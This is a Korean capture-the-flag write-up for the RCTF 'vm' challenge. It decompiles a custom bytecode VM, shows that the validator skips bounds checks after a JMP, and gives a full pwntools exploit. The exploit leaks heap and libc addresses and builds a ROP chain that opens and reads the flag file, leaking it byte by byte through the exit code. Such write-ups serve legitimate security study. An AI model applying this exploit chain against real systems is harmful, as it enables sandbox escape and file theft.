본문으로 바로가기

RCTF vm

Concept

  • 64bit짜리(?) 스택 구현

  • 구현된 instructionADD,MUL,DIV,SUB,MOV,JR(JUMP REGITSER),JMP 등등등...


Analysis

struct vm
{
 uint64_t *registers[8];
 uint64_t *rsp;
 uint64_t *rbp;
 uint8_t *pc;
 uint32_t stackSize;
 uint32_t stackCheck;
};

일단 사용하는 구조체는 위와 같다.


enum{
   OP_ADD = 0, // add
   OP_SUB,     // sub
   OP_MUL,     // mul
   OP_DIV,     // div
   OP_MOV,     // mov
   OP_JSR,     // jump register
   OP_AND,     // bitwise and
   OP_XOR,     // bitwise xor
   OP_OR,      // bitwise or
   OP_NOT,     // bitwise not
   OP_PUSH,    // push
   OP_POP,     // pop
   OP_JMP,     // jump
   OP_ALLOC,   // alloc new stack
   OP_NOP,     // nop
};

그리고 OPCODE도 위와 같다.


대충 프로그램의 동작 방식을 요약해보자면, setPointer() -> initProgram() -> inputByteCode() -> fork() -> close(0,1,2) -> initSandbox() ->startVm() -> mainVm -> printf exit code순이다.


vm *setPointer()
{
 vm *ptr; // ST00_8

 ptr = malloc(0x60uLL);
 ptr->pc = malloc(0x1000uLL);                  // input heap
 setupVm(ptr, 0x800u);
 return ptr;
}

일단 setPointer함수에서는 VM을 동작시킬때 사용하는 포인터들을 미리 선언시켜둔다.

그다음 프로그램의 기본적인 버퍼 등을 초기화 시켜준 후에, 우리의 페이로드를 입력받고, close(),initSandbox,fork()해준 후, startVm으로 들어간다.

여기서 첫번째 문제는 stdin,stdout,stderr가 싸그리 닫혀있다는 점, 그리고 initSandboxopen,read를 제외한 모든 syscall이 막혀있다는점이 있겠다.

__int64 __fastcall startVm(vm *ptr)
{
 signed int opcode; // eax
 unsigned __int8 v2; // ST21_1
 char v3; // al
 unsigned __int8 v4; // ST1D_1
 char code; // [rsp+19h] [rbp-27h]
 unsigned __int8 v7; // [rsp+1Eh] [rbp-22h]
 char v8; // [rsp+20h] [rbp-20h]
 unsigned __int8 v9; // [rsp+22h] [rbp-1Eh]
 unsigned int count; // [rsp+24h] [rbp-1Ch]
 signed int loop; // [rsp+28h] [rbp-18h]
 unsigned int size; // [rsp+2Ch] [rbp-14h]
 uint8_t *programCounter; // [rsp+30h] [rbp-10h]

 count = 0;
 programCounter = ptr->pc;                     // _BYTE
 loop = 1;
 while ( loop )
{
   ++count;
   opcode = returnIntByte(programCounter);
   if ( opcode == 9 )                          // NOT bitwise
  {
     if ( returnIntByte(programCounter + 1) > 7u )// pointer + 1 == register
       printError("Invalid register!");
     programCounter += 2;
  }
   else if ( opcode > 9 )
  {
     if ( opcode == 12 )                       // JMP
    {
       programCounter += 2;
    }
     else if ( opcode > 12 )
    {
       if ( opcode == 14 )                     // NOP
      {
         ++programCounter;
      }
       else if ( opcode < 14 )                 // ALLOC
      {
         size = returnInDword((programCounter + 1));// size(DWORD)
         if ( size <= 0xFF || size > 0x1000 )
           printError("Invalid size!");
         ptr->stackCheck = size >> 3;
         ptr->stackSize = 0;
         programCounter += 5;
      }
       else
      {
         if ( opcode != 0xFF )
exit:
           printError("Invalid code!");
         loop = 0;
      }
    }
     else if ( opcode == 10 )                  // PUSH
    {
       code = returnIntByte(programCounter + 1);
       if ( code != 1 && code )              
         printError("Invalid code!");
       if ( ptr->stackSize >= ptr->stackCheck )
         printError("Invalid code!");
       if ( code == 1 )
      {
         programCounter += 10;
      }
       else
      {
         if ( returnIntByte(programCounter + 2) > 7u )
           printError("Invalid register!");
         programCounter += 3;
      }
       ++ptr->stackSize;
    }
     else
    {
       if ( opcode != 0xB )                    // POP
         goto exit;
       if ( !ptr->stackSize )
         printError("Invalid code!");
       programCounter += 2;
       --ptr->stackSize;
    }
  }
   else if ( opcode == 4 )                     // MOV
  {
     v3 = returnIntByte(programCounter + 1);
     if ( v3 & 1 || v3 & 4 )
    {
       if ( returnIntByte(programCounter + 2) > 7u )
         printError("Invalid register!");
       programCounter += 11;
    }
     else
    {
       if ( !(v3 & 8) && !(v3 & 0x10) && !(v3 & 0x20) )
         printError("Invalid code!");
       v4 = returnIntByte(programCounter + 2);
       v7 = returnIntByte(programCounter + 3);
       if ( v4 > 7u || v7 > 7u )
         printError("Invalid register!");
       programCounter += 4;
    }
  }
   else if ( opcode > 4 )
  {
     if ( opcode != 5 )                        // JSR(Jump Register)
       goto LABEL_19;
     programCounter += 2;
  }
   else
  {
     if ( opcode < 0 )
       goto exit;
LABEL_19:
     v8 = returnIntByte(programCounter + 1);
     if ( v8 == 1 )                            // MUL
    {
       if ( returnIntByte(programCounter + 2) > 7u )
         printError("Invalid register!");
       programCounter += 11;
    }
     else                                      // ADD
    {
       if ( v8 )
         printError("Invalid code!");
       v2 = returnIntByte(programCounter + 2);
       v9 = returnIntByte(programCounter + 3);
       if ( v2 > 7u || v9 > 7u )
         printError("Invalid register!");
       programCounter += 4;
    }
  }
}
 ptr->stackCheck = 0x100;
 ptr->stackSize = 0;
 return count;
}

startVm함수에서는 mainVm에서 바이트코드를 직접 돌리기 전에 미리 OOB등을 체크해준다. 여기서 결정적인 문제가 하나 발생하게 되는데, 그건 아래 mainVm을 보면서 찾아보자.


else if ( opcode < 13 )                 // JMP
{
   programCounter += returnIntByte(programCounter + 1) + 2;
}

위 코드는 JMP문을 처리할때 사용하는 구문이다. JMP문은 JMP + BYTE(num)과 같이 사용하는데, 입력한 num만큼 programCounter를 더해준다. startVm함수에서는 이를 어떻게 처리해줄까?


if ( opcode == 12 )                       // JMP
{
   programCounter += 2;
}

놀랍게도 progarmCounter를 2더해주는거 이외에는 아무것도 해주지 않는다. 즉, JMP를 넣어두고 페이로드 뒤쪽으로 그냥 뛰어버리면 startVmOOB체크를 싸그리 무시할 수 있다.


Exploit

from pwn import *

binary = "./vm"
e = ELF(binary)
libc = e.libc

BYTE = lambda x : p8(x)
WORD = lambda x : p16(x)
DWORD = lambda x : p32(x)
QWORD = lambda x : p64(x)
REG = lambda x : p8(int(x.split("r")[1]))

AND = BYTE(6)
JMP = BYTE(12)
ALLOC = BYTE(13)
NOP = BYTE(14)
ADD = BYTE(0)
SUB = BYTE(1) # argv : SUB/ADD/AND + REG + QWORD or SUB/ADD/AND + REG + REG
# type 1 : SUB/ADD/AND register QWORD
# else   : SUB/ADD/AND register register
MOV = BYTE(4) # argv : MOV + BYTE + QWORD or MOV + BYTE + BYTE
# type 1 : MOV register ptr (index, address)
# type 4 : MOV register *ptr (index, address)
# type 8 : MOV register regitser (index, index)
# type 16 : MOV register *regitser
# type 32 : MOV *register register

END = BYTE(0xff)

i = 0
flag = ""
while True:
r = process(binary, aslr = False)

payload = ""
payload += JMP + BYTE(0xff)
payload += payload.ljust(0xff - 1,NOP) + END

payload += MOV + BYTE(8) + REG("r0") + REG("r8") # read heap address in r0
payload += MOV + BYTE(1) + REG("r9") + QWORD(0x0) # rbp
payload += MOV + BYTE(1) + REG("r11") + QWORD(0x0)
payload += ALLOC + DWORD(0x500)

payload += MOV + BYTE(8) + REG("r9") + REG("r0")
payload += MOV + BYTE(1) + REG("r11") + QWORD(0x0000010000000000)
payload += ALLOC + DWORD(0x500) # make libc address

payload += SUB + BYTE(1) + REG("r0") + QWORD(0x800) # point main_arena
payload += MOV + BYTE(16) + REG("r1") + REG("r0")
payload += SUB + BYTE(1) + REG("r1") + QWORD(0x3ec180) # libc base

payload += MOV + BYTE(8) + REG("r2") + REG("r1")
payload += ADD + BYTE(1) + REG("r2") + QWORD(libc.symbols["environ"]) # r2 = environ
payload += MOV + BYTE(16) + REG("r3") + REG("r2") # r3 = stack
payload += SUB + BYTE(1) + REG("r3") + QWORD(0x34f) # return address

rax = 0x00000000000439c8
rdi = 0x000000000002155f
rsi = 0x0000000000023e6a
rdx = 0x0000000000001b96
syscall = 0x00000000000d2975
mov_rdi_rdi = 0x00000000000520e9 # mov rdi,QWORD PTR [rdi+0x68] ; xor eax,eax ; ret

payload += SUB + BYTE(1) + REG("r2") + QWORD(libc.symbols["environ"]) # make libc base

payload += ADD + BYTE(1) + REG("r2") + QWORD(rsi) # make pop rsi ; ret
payload += MOV + BYTE(32) + REG("r3") + REG("r2")
payload += SUB + BYTE(1) + REG("r2") + QWORD(rsi) # recovery libc base
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8) # stack += 8

payload += MOV + BYTE(1) + REG("r4") + QWORD(0x0) # open() rsi
payload += MOV + BYTE(32) + REG("r3") + REG("r4")  
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8)

payload += ADD + BYTE(1) + REG("r2") + QWORD(rdi) # make pop rdi ; ret
payload += MOV + BYTE(32) + REG("r3") + REG("r2")
payload += SUB + BYTE(1) + REG("r2") + QWORD(rdi) # recovery libc base
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8) # stack += 8

payload += MOV + BYTE(8) + REG("r4") + REG("r0")
payload += MOV + BYTE(1) + REG("r5") + QWORD(u64("./flag".ljust(0x8,"\x00"))) # open() rdi
payload += MOV + BYTE(32) + REG("r4") + REG("r5")
payload += MOV + BYTE(32) + REG("r3") + REG("r4")
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8) # stack += 8

payload += ADD + BYTE(1) + REG("r2") + QWORD(rax) # make pop rax ; ret
payload += MOV + BYTE(32) + REG("r3") + REG("r2")
payload += SUB + BYTE(1) + REG("r2") + QWORD(rax) # recovery libc base
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8) # stack += 8

payload += MOV + BYTE(1) + REG("r4") + QWORD(0x2) # open() rax
payload += MOV + BYTE(32) + REG("r3") + REG("r4")
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8) # stack += 8

payload += ADD + BYTE(1) + REG("r2") + QWORD(syscall) # make syscall ; ret
payload += MOV + BYTE(32) + REG("r3") + REG("r2")
payload += SUB + BYTE(1) + REG("r2") + QWORD(syscall)
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8) # stack += 8

payload += ADD + BYTE(1) + REG("r2") + QWORD(rsi) # make pop rsi ; ret
payload += MOV + BYTE(32) + REG("r3") + REG("r2")
payload += SUB + BYTE(1) + REG("r2") + QWORD(rsi) # recovery libc base
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8) # stack += 8

payload += ADD + BYTE(1) + REG("r0") + QWORD(0x20)
payload += MOV + BYTE(8) + REG("r4") + REG("r0") # read() rsi
payload += MOV + BYTE(32) + REG("r3") + REG("r4")
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8) # stack += 8

payload += ADD + BYTE(1) + REG("r2") + QWORD(rdi) # make pop rdi ; ret
payload += MOV + BYTE(32) + REG("r3") + REG("r2")
payload += SUB + BYTE(1) + REG("r2") + QWORD(rdi) # recovery libc base
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8) # stack += 8

payload += MOV + BYTE(1) + REG("r4") + QWORD(0x0) # read() rdi
payload += MOV + BYTE(32) + REG("r3") + REG("r4")  
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8)

payload += ADD + BYTE(1) + REG("r2") + QWORD(rdx) # make pop rdx ; ret
payload += MOV + BYTE(32) + REG("r3") + REG("r2")
payload += SUB + BYTE(1) + REG("r2") + QWORD(rdx) # recovery libc base
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8) # stack += 8

payload += MOV + BYTE(1) + REG("r4") + QWORD(0x30) # read() rdx
payload += MOV + BYTE(32) + REG("r3") + REG("r4")  
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8)

payload += ADD + BYTE(1) + REG("r2") + QWORD(rax) # make pop rax ; ret
payload += MOV + BYTE(32) + REG("r3") + REG("r2")
payload += SUB + BYTE(1) + REG("r2") + QWORD(rax) # recovery libc base
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8) # stack += 8

payload += MOV + BYTE(1) + REG("r4") + QWORD(0x0) # read() rax
payload += MOV + BYTE(32) + REG("r3") + REG("r4")
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8) # stack += 8

payload += ADD + BYTE(1) + REG("r2") + QWORD(syscall) # make syscall ; ret
payload += MOV + BYTE(32) + REG("r3") + REG("r2")
payload += SUB + BYTE(1) + REG("r2") + QWORD(syscall)
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8) # stack += 8

payload += ADD + BYTE(1) + REG("r2") + QWORD(rdi) # make pop rdi ; ret
payload += MOV + BYTE(32) + REG("r3") + REG("r2")
payload += SUB + BYTE(1) + REG("r2") + QWORD(rdi)
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8) # stack += 8

payload += SUB + BYTE(1) + REG("r0") + QWORD(0x68 - i) # rdi - 0x68 ~ ??
payload += MOV + BYTE(8) + REG("r4") + REG("r0")
payload += MOV + BYTE(32) + REG("r3") + REG("r4")
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8) # stack += 8

payload += ADD + BYTE(1) + REG("r2") + QWORD(mov_rdi_rdi) # make mov rdi, rdi
payload += MOV + BYTE(32) + REG("r3") + REG("r2")
payload += SUB + BYTE(1) + REG("r2") + QWORD(mov_rdi_rdi)
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8) # stack += 8

payload += ADD + BYTE(1) + REG("r2") + QWORD(rax) # make pop rax ; ret
payload += MOV + BYTE(32) + REG("r3") + REG("r2")
payload += SUB + BYTE(1) + REG("r2") + QWORD(rax)
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8) # stack += 8

payload += MOV + BYTE(1) + REG("r4") + QWORD(0x3c) # exit() rax
payload += MOV + BYTE(32) + REG("r3") + REG("r4")  
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8)

payload += ADD + BYTE(1) + REG("r2") + QWORD(syscall) # make syscall ; ret
payload += MOV + BYTE(32) + REG("r3") + REG("r2")
payload += SUB + BYTE(1) + REG("r2") + QWORD(syscall)
payload += ADD + BYTE(1) + REG("r3") + QWORD(0x8) # stack += 8

payload = payload.ljust(0x1000,NOP)

r.recvuntil("give me your code: ")
r.send(payload)

r.recvuntil("Exit code: 0x")
tmp = chr(int(r.recv(2),16))
flag += tmp
log.info("FLAG : " + flag)

if tmp == "}":
break

else:
i += 1
r.close()

익스 특) 존나어려움

  1. 힙주소를 읽음

  2. 힙 하나 할당 후 하나 free시켜서 libc주소 읽음

  3. flag path 힙에 적어둠

  4. flag open()

  5. flag read()

  6. mov rdi, QWORD PTR [rdi + 0x68]로 rdi에 flag 한바이트 세팅

  7. call exit

  8. main의 Exit code출력 부분에 플래그 한바이트씩 나옴